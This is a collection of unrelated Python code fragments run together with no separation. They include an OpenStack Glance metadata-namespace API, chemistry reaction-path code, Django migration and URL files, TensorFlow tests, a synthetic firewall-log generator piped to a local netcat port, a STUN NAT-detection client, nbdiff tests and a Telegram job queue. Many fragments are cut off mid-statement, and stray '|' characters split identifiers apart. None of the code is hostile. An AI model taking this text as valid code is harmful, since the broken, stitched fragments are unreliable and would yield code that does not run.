api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy).delete_metadef_namespace()
namespace_obj.delete()
ns_repo.remove_properties(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata properties "
"within '%s' namespace", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def _prefix_property_name(self, namespace_detail, user_resource_type):
prefix = None
if user_resource_type and namespace_detail.resource_type_associations:
for resource_type in namespace_detail.resource_type_associations:
if resource_type.name == user_resource_type:
prefix = resource_type.prefix
break
if prefix:
if namespace_detail.properties:
new_property_dict = dict()
for (key, value) in namespace_detail.properties.items():
new_property_dict[prefix + key] = value
namespace_detail.properties = new_property_dict
if namespace_detail.objects:
for object in namespace_detail.objects:
new_object_property_dict = dict()
for (key, value) in object.properties.items():
new_object_property_dict[prefix + key] = value
object.properties = new_object_property_dict
if object.required and len(object.required) > 0:
required = [prefix + name for name in object.required]
object.required = required
return namespace_detail
class RequestDeserializer(wsgi.JSONRequestDeserializer):
_disallowed_properties = ['self', 'schema', 'created_at', 'updated_at']
def __init__(self, schema=None):
super(RequestDeserializer, self).__init__()
self.schema = schema or get_schema()
def _get_request_body(self, request):
output = super(RequestDeserializer, self).default(request)
if 'body' not in output:
msg = _('Body expected in request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
return output['body']
@classmethod
def _check_allowed(cls, image):
for key in cls._disallowed_properties:
if key in image:
msg = _("Attribute '%s' is read-only.") % key
raise webob.exc.HTTPForbidden(explanation=msg)
def index(self, request):
params = request.params.copy()
limit = params.pop('limit', None)
marker = params.pop('marker', None)
sort_dir = params.pop('sort_dir', 'desc')
if limit is None:
limit = CONF.limit_param_default
limit = min(CONF.api_limit_max, int(limit))
query_params = {
'sort_key': params.pop('sort_key', 'created_at'),
'sort_dir': self._validate_sort_dir(sort_dir),
'filters': self._get_filters(params)
}
if marker is not None:
query_params['marker'] = marker
if limit is not None:
query_params['limit'] = self._validate_limit(limit)
return query_params
def _validate_sort_dir(self, sort_dir):
if sort_dir not in ['asc', 'desc']:
msg = _('Invalid sort direction: %s') % sort_dir
raise webob.exc.HTTPBadRequest(explanation=msg)
return sort_dir
def _get_filters(self, filters):
visibility = filters.get('visibility')
if visibility:
| if visibility not in ['public', 'private']:
msg = _('Invalid visibility value: %s') % visibility
raise webob.exc.HTTPBadReq | uest(explanation=msg)
return filters
def _validate_limit(self, limit):
try:
limit = int(limit)
except ValueError:
msg = _("limit param must be an integer")
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _("limit param must be positive")
raise webob.exc.HTTPBadRequest(explanation=msg)
return limit
def show(self, request):
params = request.params.copy()
query_params = {
'filters': self._get_filters(params)
}
return query_params
def create(self, request):
body = self._get_request_body(request)
self._check_allowed(body)
try:
self.schema.validate(body)
except exception.InvalidObject as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
namespace = json.fromjson(Namespace, body)
return dict(namespace=namespace)
def update(self, request):
body = self._get_request_body(request)
self._check_allowed(body)
try:
self.schema.validate(body)
except exception.InvalidObject as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
namespace = json.fromjson(Namespace, body)
return dict(user_ns=namespace)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
super(ResponseSerializer, self).__init__()
self.schema = schema
def create(self, response, namespace):
ns_json = json.tojson(Namespace, namespace)
response = self.__render(ns_json, response, http.CREATED)
response.location = get_namespace_href(namespace)
def show(self, response, namespace):
ns_json = json.tojson(Namespace, namespace)
response = self.__render(ns_json, response)
def index(self, response, result):
params = dict(response.request.params)
params.pop('marker', None)
query = urlparse.urlencode(params)
result.first = "/v2/metadefs/namespaces"
result.schema = "/v2/schemas/metadefs/namespaces"
if query:
result.first = '%s?%s' % (result.first, |
n), subset of atoms in molecule Pn which are in Rm before reaction.")
report_mats("CP", CP)
def form_B(C):
"""Construct the B-matrices.
Returns a dict with (m, n) keys, containing the respective
subsets of C[(m, n)] that acutally participate in bond-breaking/forming.
"""
B = dict()
for (m, n), union in C.items():
key = (m, n)
B.setdefault(key, set())
B[key] |= set(union) & involved_atoms
for k, v in B.items():
B[k] = list(v)
return B
BR = form_B(CR)
BP = form_B(CP)
print(
"BR(m, n), subset of atoms in CRnm actually involved in bond forming/breaking."
)
report_mats("BR", BR)
print(
"BP(m, n), subset of atoms in CPnm actually involved in bond forming/breaking."
)
report_mats("BP", BP)
AR = form_A(rfrags, which_rfrag, pbond_diff)
AP = form_A(pfrags, which_pfrag, rbond_diff)
print("AR(m, n), subset of atoms in Rm that form bonds to atoms in Rn.")
report_mats("AR", AR)
print(
"AP(m, n), subset of atoms in Pm which had bonds with Pn (formerly bonded in R)."
)
report_mats("AP", AP)
def form_G(A):
G = dict()
for (m, n), inds in A.items():
G.setdefault(m, set())
G[m] |= set(inds)
for k, v in G.items():
G[k] = list(v)
assert len(v) > 0
return G
GR = form_G(AR)
# GP = form_G(AP)
print(f"GR: {GR}")
# print(f"GP: {GP}")
# Initial, centered, coordinates and 5 stages
r_coords = np.zeros((6, runion.coords.size))
p_coords = np.zeros((6, punion.coords.size))
def backup_coords(stage):
assert 0 <= stage < 6
r_coords[stage] = runion.coords.copy()
p_coords[stage] = punion.coords.copy()
"""
STAGE 1
Initial positioning of reactant and product molecules
"""
# Center fragments at their geometric | average
center_fragments(rfrag_lists, runion)
center_fragments(pfrag_lists, punion)
backup_coords(0)
# Translate reactant molecules
alphas = get_steps_to_active_atom_mean(
| rfrag_lists, rfrag_lists, AR, runion.coords3d
)
for rfrag, alpha in zip(rfrag_lists, alphas):
runion.coords3d[rfrag] += alpha
# Translate product molecules
betas = get_steps_to_active_atom_mean(
pfrag_lists, rfrag_lists, BR, punion.coords3d, skip=False
)
sigmas = get_steps_to_active_atom_mean(
pfrag_lists, rfrag_lists, CR, punion.coords3d, skip=False
)
bs_half = (betas + sigmas) / 2
for pfrag, bsh in zip(pfrag_lists, bs_half):
punion.coords3d[pfrag] += bsh
backup_coords(1)
print()
"""
STAGE 2
Intra-image Inter-molecular Hard-Sphere forces
"""
print(highlight_text("Stage 2, Hard-Sphere Forces"))
s2_hs_kappa = c["s2_hs_kappa"]
def hardsphere_sd_opt(geom, frag_lists, title):
print(highlight_text(title, level=1))
calc = HardSphere(geom, frag_lists, kappa=s2_hs_kappa)
geom.set_calculator(calc)
opt_kwargs = {
"max_cycles": 1000,
"max_step": 0.5,
"rms_force": 0.05,
}
opt = SteepestDescent(geom, **opt_kwargs)
opt.run()
hardsphere_sd_opt(runion, rfrag_lists, "Reactants")
hardsphere_sd_opt(punion, pfrag_lists, "Products")
backup_coords(2)
print()
"""
STAGE 3
Initial orientation of molecules
"""
print(highlight_text("Stage 3, Initial Orientation"))
# Rotate R fragments
if len(rfrag_lists) > 1:
alphas = get_steps_to_active_atom_mean(
rfrag_lists, rfrag_lists, AR, runion.coords3d
)
gammas = np.zeros_like(alphas)
for m, rfrag in enumerate(rfrag_lists):
Gm = GR[m]
gammas[m] = runion.coords3d[Gm].mean(axis=0)
r_means = np.array([runion.coords3d[frag].mean(axis=0) for frag in rfrag_lists])
for m, rfrag in enumerate(rfrag_lists):
gm = r_means[m]
rot_mat = get_rot_mat(gammas[m] - gm, alphas[m] - gm)
rot_coords = (runion.coords3d[rfrag] - gm).dot(rot_mat)
runion.coords3d[rfrag] = rot_coords + gm - rot_coords.mean(axis=0)
Ns = [0] * len(pfrag_lists)
for (m, n), CPmn in CP.items():
Ns[m] += len(CPmn)
# Rotate P fragments
for m, pfrag in enumerate(pfrag_lists):
pc3d = punion.coords3d[pfrag]
gm = pc3d.mean(axis=0)
r0Pm = pc3d - gm[None, :]
mu_Pm = np.zeros_like(r0Pm)
N = Ns[m]
for n, rfrag in enumerate(rfrag_lists):
# Skip rotation of 1-atom fragments
if len(rfrag) == 1:
continue
CPmn = CP[(m, n)]
RPmRn = get_rot_mat(
punion.coords3d[CPmn], runion.coords3d[CPmn], center=True
)
print(f"m={m}, n={n}, len(CPmn)={len(CPmn)}")
# Eq. (A2) in [1]
r0Pmn = np.einsum("ij,jk->ki", RPmRn, r0Pm.T)
mu_Pm += len(CPmn) ** 2 / N * r0Pmn
rot_mat = get_rot_mat(r0Pm, mu_Pm, center=True)
rot_coords = r0Pm.dot(rot_mat)
punion.coords3d[pfrag] = rot_coords + gm - rot_coords.mean(axis=0)
backup_coords(3)
print()
"""
STAGE 4
Alignment of reactive atoms
This stage involves three forces: hard-sphere forces and two kinds
of average translational (^t) and rotational (^r) forces (v and w,
(A3) - (A5) in [1]).
v^t and v^r arise from atoms in A^Rnm and A^Rmn, that is atoms that
participate in bond forming/breaking in R. The translational force
is usually attractive, which is counteracted by the repulsive hard-sphere
forces.
"""
print(highlight_text("Stage 4, Alignment Of Reactive Atoms"))
def composite_sd_opt(geom, keys_calcs, title, rms_force=0.05):
print(highlight_text(title, level=1))
final = " + ".join([k for k in keys_calcs.keys()])
calc = Composite(final, keys_calcs=keys_calcs)
geom.set_calculator(calc)
opt_kwargs = {
"max_step": 0.05,
"max_cycles": 2000,
"rms_force": rms_force,
}
opt = SteepestDescent(geom, **opt_kwargs)
opt.run()
def get_vr_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
rfrag_lists, rfrag_lists, AR, AR, kappa=kappa, do_trans=do_trans
)
def r_weight_func(m, n, a, b):
"""As required for (A5) in [1]."""
return 1 if a in BR[(m, n)] else 0.5
def get_wr_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
rfrag_lists,
pfrag_lists,
CR,
CP,
weight_func=r_weight_func,
skip=False,
b_coords3d=punion.coords3d,
kappa=kappa,
do_trans=do_trans,
)
def get_vp_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
pfrag_lists, pfrag_lists, AP, AP, kappa=kappa, do_trans=do_trans
)
def p_weight_func(m, n, a, b):
"""As required for (A5) in [1]."""
return 1 if a in BP[(m, n)] else 0.5
def get_wp_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
pfrag_lists,
rfrag_lists,
CP,
CR,
weight_func=p_weight_func,
skip=False,
b_coords3d=runion.coords3d,
kappa=kappa,
do_trans=do_trans,
)
s4_hs_kappa = c["s4_hs_kappa"]
s4_v_kappa = c["s4_v_kappa"]
s4_w_kappa = c["s4_w_kappa"]
vr_trans_torque = get_vr_trans_torque(kappa=s4_v_kappa)
wr_trans_torque = get_wr_trans_torque(kappa=s4_w_kappa)
r_keys_calcs = {
"hardsphere": HardSphere(runion, rfrag_lists, kappa=s4_hs_kappa),
"v": vr_trans_torque,
"w": wr_trans_torque,
}
composite_sd_opt(runion, r_keys_calcs, "Reactants")
vp_trans_torque = get_vp_trans_torque(kappa=s4_v_kappa)
wp_trans_torque = get_wp_trans_torque(kappa=s4_w_kappa)
p_keys_calcs = {
"hardsphere": HardSphere( |
# -*- coding: utf-8 -*-
from __future__ impor | t unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('broadcasts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='broadcast',
name='series',
field=models.ForeignKey(related_name=b'broadcasts', blank=True, to='broadcasts.Series', null=True),
),
migrations.AlterField(
model_name='broadcast',
na | me='status',
field=models.CharField(max_length=200, blank=True),
),
]
|
"""
WSGI config for tiendalibros project.
It exposes the WSGI callable as a module-level variable named ``application``.
|
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_ap | plication
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tiendalibros.settings")
application = get_wsgi_application()
|
# Inviwo Python script
import inviwo
import math
import time
start = time.clock()
scale = 1;
d = 15
steps = 120
for i in range(0, steps):
r = (2 * 3.14 * i) / steps
x = d*math.sin(r)
z = -d*math.cos(r)
inviwo.setPropertyValue("EntryExitPoints.camera",((x*scale,3*scale,z*scale),(0,0,0),(0,1,0 | )))
for i in range(0, steps):
r = (2 * 3.14 * i) / (steps)
x = 1.0*math.sin(r)
z = 1.0*math.cos(r)
inviwo.setCameraUp("EntryExitPoints.camera",(x*scale,z*scale,0))
end = time.clock()
fps = 2*steps / (end - start)
fps = round(fps,3)
print("Frames per second: " + s | tr(fps))
print("Time per frame: " + str(round(1000/fps,1)) + " ms") |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for experiment utils."""
import numpy as np
import os
import tempfile
import tensorflow as tf
import experiment_utils
class AsymmetricSaverTest(tf.test.TestCase):
"""Tests for asymmetric saver."""
def test_save_restore(self):
x = tf.get_variable('x', [])
y = tf.get_variable('y', [])
x_dir = tempfile.mkdtemp()
y_dir = tempfile.mkdtemp()
x_checkpoint_base = os.path.join(x_dir, 'model.ckpt')
y_checkpoint_base = os.path.join(y_dir, 'model.ckpt')
normal_saver = tf.train.Saver([x, y])
# Save a checkpoint into y_dir first.
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
normal_saver.save(sess, y_checkpoint_base, global_step=0)
saver = experiment_utils.AsymmetricSaver(
[x], [experiment_utils.RestoreSpec(
[y], os.path.join(y_dir, 'model.ckpt-0'))])
# Write an x checkpoint.
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
x_initial, y_initial = sess.run([x, y])
saver.save(sess, x_checkpoint_base)
# Load using AsymmetricSaver.
with self.test_session() as sess:
sess.run(tf.global_variables_initializer()) |
saver.restore(sess, tf.train.latest_checkpoint(x_dir))
x_final, y_final = sess.run([x, y])
# Make sure that x is loaded correctly from checkpoint, and that y
# isn't.
self.assertEqual(x_initial, x_final)
self.assertNotAllClose(y_initial, y_final)
class FilterNormalizationTest(tf.test.TestCase):
def test_basic(self):
u = tf.get_variable('abcdef/weights', shape=[7, 5, 3, 2])
v = tf. | get_variable('abcdef/biases', shape=[2])
w = tf.get_variable('unpaired/weights', shape=[7, 5, 3, 2])
x = tf.get_variable('untouched', shape=[])
normalize_ops = experiment_utils.normalize_all_filters(
tf.trainable_variables())
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
u_initial, v_initial, w_initial, x_initial = sess.run([u, v, w, x])
sess.run(normalize_ops)
u_final, v_final, w_final, x_final = sess.run([u, v, w, x])
u_norms = np.sqrt(np.sum(np.square(u_initial), axis=(0, 1, 2)))
w_norms = np.sqrt(np.sum(np.square(w_initial), axis=(0, 1, 2)))
# We expect that the abcdef weights are normalized in pairs, that
# the unpaired weights are normalized on their own, and the
# untouched weights are in fact untouched.
self.assertAllClose(np.array(u_final * u_norms), u_initial)
self.assertAllClose(np.array(v_final * u_norms), v_initial)
self.assertAllClose(np.array(w_final * w_norms), w_initial)
self.assertAllClose(x_initial, x_final)
class AssignmentHelperTest(tf.test.TestCase):
def test_basic(self):
x = tf.get_variable('x', shape=[2, 3])
y = tf.get_variable('y', shape=[4])
tf.get_variable('z', shape=[5, 6])
helper = experiment_utils.AssignmentHelper([x, y])
with self.test_session() as sess:
helper.assign(np.arange(10.0), sess)
self.assertAllClose(sess.run(x),
[[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]])
self.assertAllClose(sess.run(y), [6.0, 7.0, 8.0, 9.0])
self.assertAllClose(
helper.retrieve(sess),
[0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0])
if __name__ == '__main__':
tf.test.main()
|
#!/usr/bin/python
'''
This script is used to generate a set of random-ish events to
simulate log data from a Juniper Netscreen FW. It was built
around using netcat to feed data into Flume for ingestion
into a Hadoop cluster.
Once you have Flume configured you would use the following
command to populate data:
./gen_events.py 2>&1 | nc 127.0.0.1 9999
'''
import random
from netaddr import *
from time import sleep
protocols = ['6', '17']
common_ports = ['20','21','22','23','25','80','109','110','119','143','156','161','389','443']
action_list = ['Deny', 'Accept', 'Drop', 'Reject'];
src_network = IPNetwork('192.168.1.0/24')
dest_network = IPNetwork('172.35.0.0/16')
fo = open("replay_log.txt", "w")
wh | ile (1 == 1):
proto_index = random.randint(0,1)
protocol = protocols[proto_index]
src_port_index = random.randint(0,13)
dest_port_index = random.randint(0,13)
src_port = common_ports[src_port_index]
dest_port = common_ports[dest_port_index]
action_index = random.randint | (0,3)
action = action_list[action_index]
src_ip_index = random.randint(1,254)
src_ip = src_network[src_ip_index]
dest_ip_index = random.randint(1,65535)
dest_ip = dest_network[dest_ip_index]
event = "192.168.1.3 Netscreen-FW1: NetScreen device_id=Netscreen-FW1 [Root]system-notification-00257(traffic): start_time=\"YYYY-MM-DD HH:MM:SS\" duration=0 policy_id=125 service=syslog proto=%s src zone=Untrust dst zone=Trust action=%s sent=0 rcvd=0 src=%s dst=%s src_port=%s dst_port=%s session_id=0" % (protocol, action, src_ip, dest_ip, src_port, dest_port)
fo.write(event + "\n")
print event
sleep(0.3)
fo.close()
|
import struct, socket, time, logging
from gosh.config import STUN_SERVER, STUN_PORT, logger
from gosh import JsonSocket
#=============================================================================
# STUN Client
# ============================================================================
class StunClient(object):
## defined protocol
TCP='TCP'
UDP='UDP'
def __init__(self, pro):
self.tcp=False
if pro == 'TCP':
self.tcp = True
self.port = None
else:
self.sock = None
def NAT_Behavior_Discovery(self):
mapping = self.mapping_behavior()
if self.tcp:
self.port = None
elif self.sock:
self.sock.close()
self.sock = None
if self.tcp:
filtering = 0
else:
filtering = self.filtering_behavior()
if self.sock:
self.sock.close()
self.sock = None
return mapping, filtering
def CreateMessage(self, changeip=False, changeport=False):
""" create message binding request"""
data = {}
data["STUN-TYPE"] = 'BINDING_REQUEST'
data["CHANGE-REQUEST"] = 'CHANGE-REQUEST'
data["CHANGE-IP"] = changeip
data["CHANGE-PORT"] = changeport
return data
def binding_request(self, server, port, request, mapping=False):
""" check nat type """
udpconnect = False
if self.tcp:
self.sock = JsonSocket(JsonSocket.TCP)
self.sock.set_reuseaddr()
if self.port:
self.sock.bind(self.port)
logger.debug("binding_request: Bind on port %d" %self.port)
else:
self.port = self.sock.bind(0)
else:
if not self.sock:
self.sock = JsonSocket(JsonSocket.UDP)
if mapping:
udpconnect = True
self.sock.set_timeout(3)
if self.sock.connect(server, port, udpconnect):
self.sock.send_obj(request)
try:
data = self.sock.read_obj()
except Exception, e:
logger.debug("binding_request: %s" %e)
return False
self.local_addr = self.sock.getsockname()
logger.debug("binding_request: Local address %s:%d" %self.local_addr)
if self.tcp:
self.sock.close()
else:
self.sock.set_timeout(None)
if 'BINDING-RESPONSE' in data:
return False
return data
return False
def mapping_behavior(self):
""" mapping behav | ior testing nat """
message = self.CreateMessage()
data = self.binding_request(STUN_SERVER, STUN_PORT, message, True)
if not data:
return False
#======================== | =====================
# TEST I
# ============================================
logger.debug("mapping_behavior: TEST_I")
LOCAL_ADDR = "%s:%d" % self.local_addr
TEST_I = data['XOR-MAPPED-ADDRESS']
logger.debug("mapping_behavior: Public IP %s"%TEST_I)
OTHER_SERVER, OTHER_PORT = data['OTHER-ADDRESS'].split(":")
if LOCAL_ADDR == TEST_I:
return 10
else:
#=============================================
# TEST II
# ============================================
logger.debug("mapping_behavior: TEST_II")
message = self.CreateMessage()
data = self.binding_request(OTHER_SERVER, STUN_PORT, message, True)
if not data:
return False
TEST_II = data['XOR-MAPPED-ADDRESS']
logger.debug("mapping_behavior: Public IP %s"%TEST_II)
if TEST_I == TEST_II:
return 1
else:
#=============================================
# TEST III
# ============================================
logger.debug("mapping_behavior: TEST_III")
message = self.CreateMessage()
data = self.binding_request(OTHER_SERVER, int(OTHER_PORT), message, True)
if not data:
return False
TEST_III = data['XOR-MAPPED-ADDRESS']
logger.debug("mapping_behavior: Public IP %s"%TEST_III)
if TEST_II == TEST_III:
return 2
else:
if self.tcp:
port1 = int(TEST_I.split(":")[1])
port2 = int(TEST_II.split(":")[1])
port3 = int(TEST_III.split(":")[1])
if abs(port2-port1) < 5 and abs(port3-port1) <5:
if port1 < port2 < port3:
return 4
elif port1 > port2 > port3:
return 5
return 3
def filtering_behavior(self):
""" filtering behavior testing nat """
#=============================================
# TEST I
# ============================================
logger.debug("filtering_behavior: TEST_I")
message = self.CreateMessage()
data = self.binding_request(STUN_SERVER, STUN_PORT, message)
if not data:
return False
#=============================================
# TEST II
# ============================================
logger.debug("filtering_behavior: TEST_II")
message = self.CreateMessage(changeip=True, changeport=True)
data = self.binding_request(STUN_SERVER, STUN_PORT, message)
if data:
return 1
else:
logger.debug("filtering_behavior: TEST_III")
#=============================================
# TEST III
# ============================================
message = self.CreateMessage(changeip=False, changeport=True)
data = self.binding_request(STUN_SERVER, STUN_PORT, message)
if data:
return 2
else:
return 3
|
from django.conf.urls.defaults import *
from models import Entry, Tag
from django.vie | ws.generic.dates import ArchiveIndexView, DateDetailView
from django.views.generic import TemplateView
urlpatterns = patterns('',
url(r'^/?$', ArchiveIndexView.as_view(model=Entry, date_field="published_on"), name="news-main"),
# url(r'^(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[0-9A-Za-z-]+)/$', 'date_based.object_detail', dict(entry_dict, slug_field='slug', month_format='%m'),name="news-detail"),
url(r'^(?P<year>\d+)/(?P<month>[-\w]+ | )/(?P<day>\d+)/(?P<pk>\d+)/$',
DateDetailView.as_view(model=Entry, date_field="published_on"),
name="news_detail"),
url(r'^about/$', TemplateView.as_view(template_name='news/about.html'), name='news-about'),
)
|
from collections imp | ort OrderedDict
n = int(input())
occurrences = OrderedDict()
for _ in range(0, n):
word = input().strip()
occurrences[word] = occurrences.get(word, 0) + 1
print(len(occurrences))
print( | sep=' ', *[count for _, count in occurrences.items()])
|
from nbdiff.adapter import git_adapter as g
from pretend import stub
def test_get_modified_notebooks_empty():
g.subprocess = stub(check_output=lambda cmd: 'true\n'
if '--is-inside-work-tree' in cmd
else '')
adapter = g.GitAdapter()
result = adapter.get_modified_notebooks()
assert result == []
def test_get_modified_notebooks_deleted():
adapter = g.GitAdapter()
def check_output_stub(cmd):
if '--modified' in cmd:
output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
return output
elif '--unmerged' in cmd:
return ''.join([
'100755\thash\t{i}\tfoo.ipynb\n'
for i in [1, 2, 3]
])
elif '--is-inside-work-tree' in cmd:
return 'true\n'
elif '--show-toplevel' in cmd:
return '/home/user/Documents'
def pop | en(*args, **kwargs):
return stub(stdout=stub(read=lambda: ""))
g.open = lambda fname: stub(read=lambda: "")
g.subprocess = stub(
check_output=check_output_stub,
PIPE='foo',
Popen=popen,
)
g.os.path.exists = lambda path: 'bar.ipynb' in path
result = adapter.get_modified_notebooks()
assert result[0][2] == 'bar.ipynb'
assert len(result) == 1
def test_get_modified_notebooks():
adapter = | g.GitAdapter()
def check_output_stub(cmd):
if '--modified' in cmd:
output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
return output
elif '--unmerged' in cmd:
return ''.join([
'100755\thash\t{i}\tfoo.ipynb\n'
for i in [1, 2, 3]
])
elif '--is-inside-work-tree' in cmd:
return 'true\n'
elif '--show-toplevel' in cmd:
return '/home/user/Documents'
def popen(*args, **kwargs):
return stub(stdout=stub(read=lambda: ""))
g.open = lambda fname: stub(read=lambda: "")
g.subprocess = stub(
check_output=check_output_stub,
PIPE='foo',
Popen=popen,
)
g.os.path.exists = lambda path: True
result = adapter.get_modified_notebooks()
assert result[0][2] == 'bar.ipynb'
assert result[1][2] == 'baz.ipynb'
assert len(result) == 2
def test_get_unmerged_notebooks_empty():
g.subprocess = stub(check_output=lambda cmd: 'true\n'
if '--is-inside-work-tree' in cmd
else '')
adapter = g.GitAdapter()
result = adapter.get_unmerged_notebooks()
assert result == []
def test_get_unmerged_notebooks():
adapter = g.GitAdapter()
def check_output_stub(cmd):
if '--unmerged' in cmd:
f1 = ''.join([
'100755\thash\t{i}\tfoo.ipynb\n'
for i in [1, 2, 3]
])
f2 = ''.join([
'100755\thash\t{i}\tbar.ipynb\n'
for i in [1, 2, 3]
])
f3 = ''.join([
'100755\thash\t{i}\tfoo.py\n'
for i in [1, 2, 3]
])
return f1 + f2 + f3
elif '--is-inside-work-tree' in cmd:
return 'true\n'
elif '--show-toplevel' in cmd:
return '/home/user/Documents'
def popen(*args, **kwargs):
return stub(stdout=stub(read=lambda: ""))
g.open = lambda fname: stub(read=lambda: "")
g.subprocess = stub(
check_output=check_output_stub,
PIPE='foo',
Popen=popen,
)
result = adapter.get_unmerged_notebooks()
assert len(result) == 2
assert result[0][3] == '/home/user/Documents/foo.ipynb'
assert result[1][3] == '/home/user/Documents/bar.ipynb'
|
of the loop only if `self.put()` had triggered
# `self.__tick` because `self._next_peek` wasn't set
self.logger.debug("Next task isn't due yet. Finished!")
self.queue.put((t, job))
self._set_next_peek(t)
break
if job.removed:
self.logger.debug('Removing job %s', job.name)
continue
if job.enabled:
try:
current_week_day = datetime.datetime.now().weekday()
if any(day == current_week_day for day in job.days):
self.logger.debug('Running job %s', job.name)
job.run(self.bot)
except:
self.logger.exception('An uncaught error was raised while executing job %s',
job.name)
else:
self.logger.debug('Skipping disabled job %s', job.name)
if job.repeat and not job.removed:
self._put(job, last_t=t)
else:
self.logger.debug('Dropping non-repeating or removed job %s', job.name)
def start(self):
"""Starts the job_queue thread."""
self.__start_lock.acquire()
if not self._running:
self._running = True
self.__start_lock.release()
self.__thread = Thread(target=self._main_loop, name="job_queue")
self.__thread.start()
self.logger.debug('%s thread started', self.__class__.__name__)
else:
self.__start_lock.release()
def _main_loop(self):
"""
Thread target of thread ``job_queue``. Runs in background and performs ticks on the job
queue.
"""
while self._running:
# self._next_peek may be (re)scheduled during self.tick() or self.put()
with self.__next_peek_lock:
tmout = self._next_peek - time.time() if self._next_peek else None
self._next_peek = None
self.__tick.clear()
self.__tick.wait(tmout)
# If we were woken up by self.stop(), just bail out
if not self._running:
break
self.tick()
self.logger.debug('%s thread stopped', self.__class__.__name__)
def stop(self):
"""Stops the thread."""
with self.__start_lock:
self._running = False
self.__tick.set()
if self.__thread is not None:
self.__thread.join()
def jobs(self):
"""Returns a tuple of all jobs that are currently in the ``JobQueue``."""
return tuple(job[1] for job in self.queue.queue if job)
class Job(object):
"""This class encapsulates a Job.
Attributes:
callback (:obj:`callable`): The callback function that should be executed by the new job.
context (:obj:`object`): Optional. Additional data needed for the callback function.
name (:obj:`str`): Optional. The name of the new job.
Args:
callback (:obj:`callable`): The callback function that should be executed by the new job.
It should take ``bot, job`` as parameters, where ``job`` is the
:class:`telegram.ext.Job` instance. It can be used to access it | 's :attr:`context`
or change it to a repeating job.
interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`, optional): The interval in
which the job will run. If it is an :obj:`int` or a :obj:`float`, it will be
interpreted as seconds. If you don't set this value, you must | set :attr:`repeat` to
``False`` and specify :attr:`next_t` when you put the job into the job queue.
repeat (:obj:`bool`, optional): If this job should be periodically execute its callback
function (``True``) or only once (``False``). Defaults to ``True``.
context (:obj:`object`, optional): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``.
name (:obj:`str`, optional): The name of the new job. Defaults to ``callback.__name__``.
days (Tuple[:obj:`int`], optional): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
job_queue (class:`telegram.ext.JobQueue`, optional): The ``JobQueue`` this job belongs to.
Only optional for backward compatibility with ``JobQueue.put()``.
"""
def __init__(self,
callback,
interval=None,
repeat=True,
context=None,
days=Days.EVERY_DAY,
name=None,
job_queue=None):
self.callback = callback
self.context = context
self.name = name or callback.__name__
self._repeat = repeat
self._interval = None
self.interval = interval
self.repeat = repeat
self._days = None
self.days = days
self._job_queue = weakref.proxy(job_queue) if job_queue is not None else None
self._remove = Event()
self._enabled = Event()
self._enabled.set()
def run(self, bot):
"""Executes the callback function."""
self.callback(bot, self)
def schedule_removal(self):
"""
Schedules this job for removal from the ``JobQueue``. It will be removed without executing
its callback function again.
"""
self._remove.set()
@property
def removed(self):
""":obj:`bool`: Whether this job is due to be removed."""
return self._remove.is_set()
@property
def enabled(self):
""":obj:`bool`: Whether this job is enabled."""
return self._enabled.is_set()
@enabled.setter
def enabled(self, status):
if status:
self._enabled.set()
else:
self._enabled.clear()
@property
def interval(self):
"""
:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`: Optional. The interval in which the
job will run.
"""
return self._interval
@interval.setter
def interval(self, interval):
if interval is None and self.repeat:
raise ValueError("The 'interval' can not be 'None' when 'repeat' is set to 'True'")
if not (interval is None or isinstance(interval, (Number, datetime.timedelta))):
raise ValueError("The 'interval' must be of type 'datetime.timedelta',"
" 'int' or 'float'")
self._interval = interval
@property
def interval_seconds(self):
""":obj:`int`: The interval for this job in seconds."""
if isinstance(self.interval, datetime.timedelta):
return self.interval.total_seconds()
else:
return self.interval
@property
def repeat(self):
""":obj:`bool`: Optional. If this job should periodically execute its callback function."""
return self._repeat
@repeat.setter
def repeat(self, repeat):
if self.interval is None and repeat:
raise ValueError("'repeat' can not be set to 'True' when no 'interval' is set")
self._repeat = repeat
@property
def days(self):
"""Tuple[:obj:`int`]: Optional. Defines on which days of the week the job should run."""
return self._days
@days.setter
def days(self, days):
if not isinstance(days, tuple):
raise ValueError("The 'days' argument should be of type 'tuple'")
if not all(isinstance(day, int) for day in days):
raise ValueError("The elements of the 'days' argument should be of type 'int'")
if not all(0 <= day <= 6 for day in days):
raise ValueError("The elements of the 'days' argument should be from 0 up to and "
|
# Add a display showing the error token itsels:
